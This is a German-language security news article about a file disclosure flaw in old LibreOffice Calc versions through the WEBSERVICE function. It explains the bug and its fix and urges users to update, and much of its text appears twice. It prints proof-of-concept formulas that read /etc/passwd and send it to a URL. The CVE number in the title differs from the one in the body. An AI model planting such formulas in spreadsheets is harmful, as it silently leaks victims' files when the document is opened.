0
LibreOffice: Alte Versionen mit Remote Arbitrary File Disclosure-Sicherheitslücke (CVE-2018-68719)
Noch eine schnelle Information für Nutzer von LibreOffice. Die Woche hat der eine oder andere Nutzer wohl mitbekommen, dass LibreOffice 6 herausgekommen ist. Soll hier aber nicht thematisiert werden - sondern es geht um eine Remote Arbitrary File Disclosure-Sicherheitslücke, die in alten LibreOffice-Versionen steckt.
In LibreOffice gibt es inzwischen Unterstützung für die Funktion COM.MICROSOFT.WEBSERVICE aus Microsoft Office. Eine Beschreibung der Funktion, die in Microsoft Excel 2013 und 2016 verfügbar ist, findet sich auf dieser Microsoft Seite. Über die Funktion kann Excel Daten von einem Webservice im Internet oder Intranet. Hier ein Beispiel für den Funktionsaufruf in einer Excel-Zellformel.
Microsoft hat für diese Funktion in Excel aber eine gewichtige Einschränkung implementiert: Protokolle wie ftp:und file: werden nicht unterstützt, die Funktion WEBSERVICE liefert den Fehlerwert #VALUE! zurück. Es lassen sich also keine Dateien per ftp oder file-Protokoll über diese Funktion implementieren.
Was in Microsoft Excel also berücksichtigt wurde, ist in LibreOffice vor den Versionen 5.4.5/6.0.1 leider nicht als Restriktion implementiert. Wäre zwar kein Problem, da Zellen in LibreOffice Calc Tabellen standardmäßig nicht aktualisiert werden. @jollheef (Mikhail Klementev) von seccomp.ru hat aber einen Weg gefunden, dies über den einen Zelltyp zu umgehen, so dass Zelle beim Öffnen des Dokuments aktualisiert wird. Dies ermöglicht es, lokale Dateien über die WEBSERVICE-Funktion
zu versenden. Ein Proof of Concept hat er auf GitHub erläutert. Um eine Datei lokal zu lesen, ließe sich in LibreOffice Calc folgende Anweisung (z.B. unter Linux) verwenden:
Die nachfolgende Anweisung versucht eine lokale (Passwort) Datei zu lesen und dann zu versenden:
In anderen LibreOffice-Modulen kann eine Calc-Tabelle in deren Dokumente eingebunden werden. Dann ermöglicht die Sicherheitslücke CVE-2018-6871 beliebige Dateien im Zugriff des Benutzers zu lesen und ins Internet zu versenden. Alles, was im Zugriff des lokalen Benutzers liegt, könnte als gelesen und ins Internet verschickt werden (inklusive sensitiver Dateien). Die Erfolgsquote liegt bei 100%, und funktioniert in allen LibreOffice Versionen vor 5.4.5/6.0.1 auf allen Betriebssystemen (GNU/Linux, MS Windows, MacOS). Für den Nutzer erfolgt das Ganze unsichtbar im Hintergrund – er bekommt davon nichts mit. Alles, was es braucht, ist eine präparierte Datei mit der manipulierten Calc-Tabelle.
Der Fehler ist den LibreOffice-Entwicklern bekannt. In den LibreOffice Versionen 5.4.5/6.0.1 ist das Problem behoben. Dort wurde die Funktion WEBSERVICE nun darauf beschränkt, auf http- und https-URLs zuzugreifen und WEBSERVICE-URLs unter die Linkmanagement-Infrastruktur von LibreOffice Calc zu stellen. Es bleibt also nur, so schnell als möglich auf die LibreOffice Versionen 5.4.5/6.0.1 und höher umzusteigen. (via)
Die Excel WEBSERVICE-Funktion
In LibreOffice gibt es inzwischen Unterstützung für die Funktion COM.MICROSOFT.WEBSERVICE aus Microsoft Office. Eine Beschreibung der Funktion, die in Microsoft Excel 2013 und 2016 verfügbar ist, findet sich auf dieser Microsoft Seite. Über die Funktion kann Excel Daten von einem Webservice im Internet oder Intranet. Hier ein Beispiel für den Funktionsaufruf in einer Excel-Zellformel.
//=WEBSERVICE(“http://mywebservice.com/serviceEndpoint?searchString=Excel”) //Microsoft hat für diese Funktion in Excel aber eine gewichtige Einschränkung implementiert: Protokolle wie ftp:und file: werden nicht unterstützt, die Funktion WEBSERVICE liefert den Fehlerwert #VALUE! zurück. Es lassen sich also keine Dateien per ftp oder file-Protokoll über diese Funktion implementieren.
Remote Arbitrary File Disclosure (CVE-2018-6871) in LibreOffice
Was in Microsoft Excel also berücksichtigt wurde, ist in LibreOffice vor den Versionen 5.4.5/6.0.1 leider nicht als Restriktion implementiert. Wäre zwar kein Problem, da Zellen in LibreOffice Calc Tabellen standardmäßig nicht aktualisiert werden. @jollheef (Mikhail Klementev) von seccomp.ru hat aber einen Weg gefunden, dies über den einen Zelltyp zu umgehen, so dass Zelle beim Öffnen des Dokuments aktualisiert wird. Dies ermöglicht es, lokale Dateien über die WEBSERVICE-Funktion
zu versenden. Ein Proof of Concept hat er auf GitHub erläutert. Um eine Datei lokal zu lesen, ließe sich in LibreOffice Calc folgende Anweisung (z.B. unter Linux) verwenden:
//=WEBSERVICE("/etc/passwd")//Die nachfolgende Anweisung versucht eine lokale (Passwort) Datei zu lesen und dann zu versenden:
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))In anderen LibreOffice-Modulen kann eine Calc-Tabelle in deren Dokumente eingebunden werden. Dann ermöglicht die Sicherheitslücke CVE-2018-6871 beliebige Dateien im Zugriff des Benutzers zu lesen und ins Internet zu versenden. Alles, was im Zugriff des lokalen Benutzers liegt, könnte als gelesen und ins Internet verschickt werden (inklusive sensitiver Dateien). Die Erfolgsquote liegt bei 100%, und funktioniert in allen LibreOffice Versionen vor 5.4.5/6.0.1 auf allen Betriebssystemen (GNU/Linux, MS Windows, MacOS). Für den Nutzer erfolgt das Ganze unsichtbar im Hintergrund – er bekommt davon nichts mit. Alles, was es braucht, ist eine präparierte Datei mit der manipulierten Calc-Tabelle.
Fehler bei LibreOffice bekannt und gefixt
Der Fehler ist den LibreOffice-Entwicklern bekannt. In den LibreOffice Versionen 5.4.5/6.0.1 ist das Problem behoben. Dort wurde die Funktion WEBSERVICE nun darauf beschränkt, auf http- und https-URLs zuzugreifen und WEBSERVICE-URLs unter die Linkmanagement-Infrastruktur von LibreOffice Calc zu stellen. Es bleibt also nur, so schnell als möglich auf die LibreOffice Versionen 5.4.5/6.0.1 und höher umzusteigen. (via)
Share on Facebook
Share on Twitter
Share on Reddit
Share on LinkedinPlease also mark the comments that contributed to the solution of the article
Content-Key: 364403
Url: https://administrator.de/contentid/364403
Printed on: April 20, 2024 at 00:04 o'clock
